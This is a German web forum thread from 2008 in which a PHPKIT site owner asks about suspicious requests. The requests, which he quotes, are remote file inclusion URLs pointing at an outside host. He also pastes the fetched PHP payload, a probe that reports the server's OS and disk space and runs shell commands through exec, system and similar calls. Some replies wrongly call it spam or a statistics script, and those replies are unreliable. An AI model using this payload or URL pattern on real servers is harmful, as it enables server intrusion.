Komische Seitenzugriffe ?

Forum Partner+Friends LinkUs Downloads KNW Suche TS³ Viewer Twitter Facebook

Sie sind nicht angemeldet. Anmelden

kingmig

ist gerade angekommen

Beiträge: 5

Geschlecht: Männlich

PHPKIT Version: 1.6.1

Mittwoch, 20. August 2008, 13:51

Komische Seitenzugriffe ?

Hallo,

in den letzten Tagen beobachte ich immer wieder, dass unter den Gäste folgende Seitezugriffe erfolgen :

http://www.meineseite.de/phpkit/include.php?path=forum/errors.php?error=http://rampagearcade.com/arcade/img/jaemid.txt??

Welchen Zweck hat der User damit ?

Kann ich das unterbinden ?

Gruss Kingmig

P.S. : phpkit 1.6.1.

W0nd3r

weiß wie man Threads erstellt

Beiträge: 199

Geschlecht: Männlich

Wohnort: Hessen

PHPKIT Version: 1.6.03

Mittwoch, 20. August 2008, 14:13

Würd mal sagen da versucht ein Spam-Bot auf deiner Seite Spam zu verbreiten...
Schau mal: http://rampagearcade.com/arcade/img/jaemid.txt

Don´t eat yellow snow!

philosapiens

Hilfologe

Beiträge: 657

Geschlecht: Männlich

Wohnort: Berlin

PHPKIT Version: 1.6.1

Mittwoch, 20. August 2008, 14:47

Hi,

also ich würde das genauer beobachten, da eine nicht existierende Datei (errors.php) versucht wird aufzurufen. Im Umkehrschluss kann das auch heißen, dass versucht wurde oder noch wird, diese eben auf den jeweiligen ftp zu bekommen. Sollte es "nur" Spam sein, kann es ärgerlich sein. Es könnte aber auch schlimmeres sein oder versucht werden.

Ich würde mal meinen ftp nach dieser Datei absuchen und schauen, ob, wenn sie existieren sollte, auch zu den jeweiligen Addons oder Hacks oder gar zur orginal Software gehören soll.

Vorsicht ist die Mutter der Porzelankiste!!! :huh:

Leider nutze ich das phpkit immer weniger und bastele mehr Eigenes:

kingmig

ist gerade angekommen

Beiträge: 5

Geschlecht: Männlich

PHPKIT Version: 1.6.1

Donnerstag, 21. August 2008, 12:57

Erstmal danke für die Antworten.

Hab den Server mit den Original Daten verglichen, sind keine zusätzlichen Dateien drauf.

Diese Links erscheinen aber mehrmal täglich mit verschiedenen Inhalten und Verweisen.

Wenn man die txt Dateien aufruft sehen sie wie folgt aus :

-----------------------------------------------------------------------------------

<?
$dir = @getcwd();
echo "Mic22<br>";
$OS = @PHP_UNAME();
echo "OSTYPE:$OS<br>";
$free = disk_free_space($dir);

if ($free === FALSE) {$free = 0;}

if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";

$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;

function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}

function view_size($size)

{

if (!is_numeric($size)) {return FALSE;}

else

{

if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}

elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}

elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}

else {$size = $size . " B";}

return $size;

}}

exit;
---------------------------------------------------------------------------------------------------

Was vielleicht einer der Progger was damit bezweckt wird ?

Gruss kingmig

Proggi

unregistriert

Donnerstag, 21. August 2008, 13:26

Also mal ganz einfach gesagt und vielleicht auch etwas "doof".....

Kann es sein, dass Du nen Cronjob oder ein Script laufen hast, das den verügbaren Speicherplatz auf Deinem Webspace in gewissen Abständen prüft???
Denn das passiert in dem Script. Es wird geprüft wieviel Platz auf Deinem Account noch frei ist bzw wieviel Platz überhaupt zur Verfügung steht.

Hast Du über einen Dienst im Internet einen Cronjob angelegt, der Deinen Webspace überprüft bzw bei welchem Hoster liegen Deine Seiten?

Für mich ist das ein Statistik-Script - siehe folgendes:

PHP-Quelltext

if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;

Netten Gruß

Andy --- Proggi

kingmig

ist gerade angekommen

Beiträge: 5

Geschlecht: Männlich

PHPKIT Version: 1.6.1

Donnerstag, 21. August 2008, 13:46

Nein, habe keinen Cronjob bzw Script laufen und die Aufrufe kommen von den unterschiedlichsten Servern ( aus aller Welt) mit den unterschiedlichsten Datei-Namen.

Es werden immer txt files über ein php Script meines Servers aufgrufen : error.php, popup.php, usw.

Sie sehen auch nicht alle 100 % genauso aus, aber ähneln alle dem o.g. Script

Die Textdateien von gestern sind teilweise auch heute nicht mehr aufrufbar.

Gruss Kingmig

Proggi

unregistriert

Donnerstag, 21. August 2008, 13:54

Dann siehe den Post von philosapiens

Beobachte das in den nächsten Tagen intensiv und vor allem kontrolliere Deinen Space ob nicht wirklich eine Datei vorhanden ist, die da nicht hingehört!

Netten Gruß

Andy --- Proggi

philosapiens

Hilfologe

Beiträge: 657

Geschlecht: Männlich

Wohnort: Berlin

PHPKIT Version: 1.6.1

Donnerstag, 21. August 2008, 13:58

Hi,

genau daher ja auch meine Vermutung, dass jemand oder ein bot schaut, ob bei Dir genug Platz ist und dann könntest Du als "Zwischenlager" mißbraucht werden. Da ich aber mal vermute, dass Du Deine Daten aus der Auflistung des HackBlocks hast, solltest Du ruhig schlafen können, da diese bösen Geschöpfe ja eben nicht an Deinen ftp rankommen. Sie werden ja geblockt.

Leider nutze ich das phpkit immer weniger und bastele mehr Eigenes:

Komische Seitenzugriffe ?

Komische Seitenzugriffe ?

PHP-Quelltext

Ähnliche Themen

Tagging